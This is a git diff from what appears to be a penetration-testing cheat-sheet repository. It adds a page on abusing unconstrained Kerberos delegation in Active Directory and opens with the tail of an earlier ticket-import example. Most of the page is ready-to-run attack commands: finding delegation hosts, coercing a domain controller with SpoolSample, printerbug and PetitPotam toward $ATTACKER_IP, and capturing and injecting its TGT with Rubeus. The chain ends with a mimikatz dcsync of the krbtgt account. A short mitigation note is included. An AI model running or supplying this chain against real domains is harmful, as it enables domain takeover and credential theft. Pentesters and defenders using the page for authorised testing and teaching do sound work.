doIGXDCCBligAwIBBaEDAgEWooIFXDCCBVhhggVUMIIFUKADAgEFoQ0bC0ZBQ1RPUlkuTEFOoicwJaAD + AgECoR4wHBsEY2lmcxsUZGMwMS[...]PMIIFC6ADAgESoQMCAQOiggT9BIIE + LmZhY3RvcnkubGFu + + [*] Action: Import Ticket + [+] Ticket successfully imported! + ``` \ No newline at end of file diff --git a/docs/active-directory/kerberos-delegation-unconstrained.md b/docs/active-directory/kerberos-delegation-unconstrained.md new file mode 100644 index 0000000..078e43d --- /dev/null +++ b/docs/active-directory/kerberos-delegation-unconstrained.md @@ -0,0 +1,119 @@ +# Kerberos Delegation - Unconstrained Delegation + +> The user sends a ST to access the service, along with their TGT, and then the service can use the user's TGT to request a ST for the user to any other service and impersonate the user. - https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html + +> When a user authenticates to a computer that has unrestricted kerberos delegation privilege turned on, authenticated user's TGT ticket gets saved to that computer's memory. + +:warning: Unconstrained delegation used to be the only option available in Windows 2000 + +> **Warning** +> Remember to coerce to a HOSTNAME if you want a Kerberos Ticket + +## SpoolService Abuse with Unconstrained Delegation + +The goal is to gain DC Sync privileges using a computer account and the SpoolService bug. + +**Requirements**: +- Object with Property **Trust this computer for delegation to any service (Kerberos only)** +- Must have **ADS_UF_TRUSTED_FOR_DELEGATION** +- Must not have **ADS_UF_NOT_DELEGATED** flag +- User must not be in the **Protected Users** group +- User must not have the flag **Account is sensitive and cannot be delegated** + +### Find delegation + +:warning: : Domain controllers usually have unconstrained delegation enabled. +Check the `TRUSTED_FOR_DELEGATION` property. + +* [ADModule](https://github.com/samratashok/ADModule) + ```powershell + # From https://github.com/samratashok/ADModule + PS> Get-ADComputer -Filter {TrustedForDelegation -eq $True} + ``` + +* [ldapdomaindump](https://github.com/dirkjanm/ldapdomaindump) + ```powershell + $> ldapdomaindump -u "DOMAIN\\Account" -p "Password123*" 10.10.10.10 + grep TRUSTED_FOR_DELEGATION domain_computers.grep + ``` + +* [CrackMapExec module](https://github.com/mpgn/CrackMapExec/wiki) + ```powershell + cme ldap 10.10.10.10 -u username -p password --trusted-for-delegation + ``` + +* BloodHound: `MATCH (c:Computer {unconstraineddelegation:true}) RETURN c` +* Powershell Active Directory module: `Get-ADComputer -LDAPFilter "(&(objectCategory=Computer)(userAccountControl:1.2.840.113556.1.4.803:=524288))" -Properties DNSHostName,userAccountControl` + + +### SpoolService status + +Check if the spool service is running on the remote host + +```powershell +ls \\dc01\pipe\spoolss +python rpcdump.py DOMAIN/user:password@10.10.10.10 +``` + +### Monitor with Rubeus + +Monitor incoming connections from Rubeus. + +```powershell +Rubeus.exe monitor /interval:1 +``` + +### Force a connect back from the DC + +Due to the unconstrained delegation, the TGT of the computer account (DC$) will be saved in the memory of the computer with unconstrained delegation. By default the domain controller computer account has DCSync rights over the domain object. + +> SpoolSample is a PoC to coerce a Windows host to authenticate to an arbitrary server using a "feature" in the MS-RPRN RPC interface. + +```powershell +# From https://github.com/leechristensen/SpoolSample +.\SpoolSample.exe VICTIM-DC-NAME UNCONSTRAINED-SERVER-DC-NAME +.\SpoolSample.exe DC01.HACKER.LAB HELPDESK.HACKER.LAB +# DC01.HACKER.LAB is the domain controller we want to compromise +# HELPDESK.HACKER.LAB is the machine with delegation enabled that we control. + +# From https://github.com/dirkjanm/krbrelayx +printerbug.py 'domain/username:password'@ + +# From https://gist.github.com/3xocyte/cfaf8a34f76569a8251bde65fe69dccc#gistcomment-2773689 +python dementor.py -d domain -u username -p password +``` + +If the attack worked you should get a TGT of the domain controller. + +### Load the ticket + +Extract the base64 TGT from Rubeus output and load it to our current session. + +```powershell +.\Rubeus.exe asktgs /ticket: /service:LDAP/dc.lab.local,cifs/dc.lab.local /ptt +``` + +Alternatively you could also grab the ticket using Mimikatz : `mimikatz # sekurlsa::tickets` + +Then you can use DCsync or another attack : `mimikatz # lsadump::dcsync /user:HACKER\krbtgt` + + +### Mitigation + +* Ensure sensitive accounts cannot be delegated +* Disable the Print Spooler Service + + +## MS-EFSRPC Abuse with Unconstrained Delegation + +Using `PetitPotam`, another tool to coerce a callback from the targeted machine, instead of `SpoolSample`. + +```bash +# Coerce the callback +git clone https://github.com/topotam/PetitPotam +python3 petitpotam.py -d $DOMAIN -u $USER -p $PASSWORD $ATTACKER_IP $TARGET_IP +python3 petitpotam.py -d '' -u '' -p '' $ATTACKER_IP $TARGET_IP + +# Extract the ticket +.\Rubeus.exe asktgs /ticket: /ptt +``` \ No newline at end of file diff --git a/docs/active-directory/ad-kerberos-tickets.md b/docs/active-directory/kerberos-tickets.md similarity index 99% rename from docs/active-directory/ad-kerberos-tickets.md rename to docs/active-directory/kerberos-tickets.md index 854e7a9..7e8a346 100644 --- a/docs/active-directory/ad-kerberos-tickets.md +++ b/docs/active-directory/kerberos-tickets.md @@ -1,4 +1,4 @@ -# Kerberos Tickets +# Kerberos - Tickets Tickets are used to grant access to network resources. A ticket is a data structure that contains information about the user's identity, the network service or resource being accessed, and the permissions or privileges associated with that resource. Kerberos tickets have a limited lifetime and expire after a set period of time, typically 8 to 12 hours.